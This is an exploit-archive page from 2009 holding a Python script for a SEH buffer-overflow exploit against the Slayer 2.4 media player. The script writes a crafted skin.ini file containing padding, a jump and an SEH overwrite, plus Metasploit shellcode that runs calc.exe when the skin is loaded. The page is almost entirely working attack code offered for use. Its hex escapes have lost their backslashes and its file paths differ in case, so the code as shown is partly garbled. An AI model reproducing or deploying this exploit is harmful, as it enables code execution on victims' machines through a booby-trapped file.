[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Slayer 2.4 (skin) Universal Buffer Overflow Exploit (SEH)
# Published : 2009-05-26
# Author : SuNHouSe2
# Previous Title : Winamp 5.551 MAKI Parsing Integer Overflow Exploit
# Next Title : PHP <= 5.2.9 Local Safemod Bypass Exploit (win32)
#!/usr/bin/python
print "**************************************************************************"
print "[~]Slayer v2.4 (skin) Universal Seh Overflow Exploit (SEH)n"
print "[~]AUTHOR: SuNHouSe2 [ALGERIAN HaCkEr]n"
print "[~]Email : sunhouse2@yahoo.comn"
print "[~]HOME : http://www.snakespc.comn"
print "[~]Tested on: Windows XP Pro SP3 (FR)n"
print "[~]Special ThanX : His0k4,& ALL Snakespc.com Membersn"
print "**************************************************************************"
import os
header1=(
"x5bx53x43x52x45x45x4ex5dx0ax4dx61x73x6bx3dx2ex2ex2fx61x62x64"
"x2fx6dx61x73x6bx2ex62x6dx70x0ax4dx61x69x6ex3dx2ex2ex2fx61x62"
"x64x2fx6dx61x69x6ex2ex6ax70x67x0ax44x6fx77x6ex3dx2ex2ex2fx61"
"x62x64x2fx53x65x6cx65x63x74x65x64x2ex6ax70x67x0ax4fx76x65x72"
"x3dx2ex2ex2fx61x62x64x2fx4fx76x65x72x2ex6ax70x67x0ax44x69x73"
"x61x62x6cx65x64x3dx2ex2ex2fx61x62x64x2fx6dx61x69x6ex2ex6ax70"
"x67x0ax0ax5bx42x55x54x54x4fx4ex49x4ex46x4fx5dx0ax31x3d")
header2=(
"x2cx33x32x34x2cx37x36x2cx32x34x2cx31x36x2cx43x6fx6ex66x69x67"
"x75x72x61x74x69x6fx6ex2cx46x41x4cx53x45x0ax32x3dx42x5fx56x4f"
"x42x2cx32x39x2cx33x31x2cx31x34x2cx31x35x2cx4cx61x6ex67x75x61"
"x67x65x20x53x65x6cx65x63x74x69x6fx6ex2cx46x41x4cx53x45x0ax33"
"x3dx42x5fx50x4cx41x59x4cx49x53x54x2cx37x30x2cx34x39x2cx31x34"
"x2cx31x35x2cx50x6cx61x79x6cx69x73x74x2cx46x41x4cx53x45x0ax34"
"x3dx42x5fx4dx55x54x45x2cx36x34x2cx37x35x2cx31x34x2cx31x35x2c"
"x4dx75x74x65x2cx46x41x4cx53x45x0ax35x3dx42x5fx46x55x4cx4cx53"
"x43x52x45x45x4ex2cx37x32x2cx32x36x2cx31x34x2cx31x35x2cx46x75"
"x6cx6cx73x63x72x65x65x6ex2cx46x41x4cx53x45x0ax36x3dx42x5fx41"
"x42x4fx55x54x2cx33x34x2cx38x36x2cx31x33x2cx31x33x2cx41x62x6f"
"x75x74x2cx46x41x4cx53x45x0ax37x3dx42x5fx4fx50x45x4ex2cx32x39"
"x39x2cx37x36x2cx32x34x2cx31x36x2cx4fx70x65x6ex2cx46x41x4cx53"
"x45x0ax38x3dx42x5fx43x4cx4fx53x45x2cx34x32x33x2cx35x2cx31x32"
"x2cx31x30x2cx43x6cx6fx73x65x2cx46x41x4cx53x45x0ax39x3dx42x5f"
"x50x52x45x56x2cx32x34x39x2cx37x36x2cx32x34x2cx31x36x2cx50x72"
"x65x76x69x6fx75x73x20x43x6cx69x70x2cx46x41x4cx53x45x0ax31x30"
"x3dx42x5fx4ex45x58x54x2cx32x37x34x2cx37x36x2cx32x34x2cx31x36"
"x2cx4ex65x78x74x20x43x6cx69x70x2cx46x41x4cx53x45x0ax31x31x3d"
"x42x5fx53x54x4fx50x2cx32x32x34x2cx37x36x2cx32x34x2cx31x36x2c"
"x53x74x6fx70x2cx46x41x4cx53x45x0ax31x32x3dx42x5fx50x4cx41x59"
"x2cx31x39x39x2cx37x36x2cx32x34x2cx31x36x2cx50x6cx61x79x2cx46"
"x41x4cx53x45x0ax0ax5bx50x52x4fx47x52x45x53x53x49x4ex46x4fx5d"
"x0ax31x3dx50x52x4fx47x52x45x53x53x5fx50x4fx53x2cx2cx31x34x39"
"x2cx37x30x2cx32x34x34x2cx34x2cx56x0ax0ax5bx54x45x58x54x49x4e"
"x46x4fx5dx0ax31x3dx54x45x58x54x5fx53x4cx41x59x45x52x2cx41x72"
"x69x61x6cx2cx54x52x55x45x2cx54x52x55x45x2cx2dx31x33x2cx38x33"
"x38x38x36x30x38x2cx31x36x30x2cx32x35x2cx38x30x2cx31x35x2cx0a"
"x32x3dx54x45x58x54x5fx43x4cx49x50x5fx4ex41x4dx45x2cx41x72x69"
"x61x6cx2cx46x41x4cx53x45x2cx54x52x55x45x2cx2dx31x31x2cx31x36"
"x37x31x31x36x38x30x2cx31x36x31x2cx34x30x2cx32x31x38x2cx31x35"
"x2cx0ax33x3dx54x45x58x54x5fx50x4fx53x2cx41x72x69x61x6cx2cx46"
"x41x4cx53x45x2cx54x52x55x45x2cx2dx31x31x2cx31x36x37x31x31x36"
"x38x30x2cx32x34x30x2cx32x35x2cx31x36x30x2cx31x35x2cx0ax34x3d"
"x54x45x58x54x5fx43x4cx49x50x5fx49x4ex46x4fx2cx41x72x69x61x6c"
"x2cx46x41x4cx53x45x2cx54x52x55x45x2cx2dx31x31x2cx31x36x37x31"
"x31x36x38x30x2cx31x36x31x2cx35x35x2cx35x30x2cx31x35x2cx0ax35"
"x3dx54x45x58x54x5fx54x49x50x2cx41x72x69x61x6cx2cx46x41x4cx53"
"x45x2cx54x52x55x45x2cx2dx31x31x2cx32x35x35x2cx33x30x30x2cx35"
"x35x2cx35x30x2cx31x35x2cx0a")
# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
shellcode=(
"x31xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x1e"
"xc7xd0x3cx83xebxfcxe2xf4xe2x2fx94x3cx1exc7x5bx79"
"x22x4cxacx39x66xc6x3fxb7x51xdfx5bx63x3exc6x3bx75"
"x95xf3x5bx3dxf0xf6x10xa5xb2x43x10x48x19x06x1ax31"
"x1fx05x3bxc8x25x93xf4x38x6bx22x5bx63x3axc6x3bx5a"
"x95xcbx9bxb7x41xdbxd1xd7x95xdbx5bx3dxf5x4ex8cx18"
"x1ax04xe1xfcx7ax4cx90x0cx9bx07xa8x30x95x87xdcxb7"
"x6exdbx7dxb7x76xcfx3bx35x95x47x60x3cx1exc7x5bx54"
"x22x98xe1xcax7ex91x59xc4x9dx07xabx6cx76x37x5ax38"
"x41xafx48xc2x94xc9x87xc3xf9xa4xb1x50x7dxc7xd0x3c")
payload = header1
payload += "x41"*(348-len(shellcode))
payload += shellcode
payload += "xE9x5BxFFxFFxFF"
payload += "x90"*15
payload += "xEBxEAxFFxFF"
payload += "x50x37x40"
payload += header2
try:
os.mkdir("sunhouse")
out_file = open(r'SuNHouSe/skin.ini', 'w')
out_file.write(payload)
out_file.close()
raw_input("nExploit file created!n")
except:
print "Error"
# www.Syue.com [2009-05-26]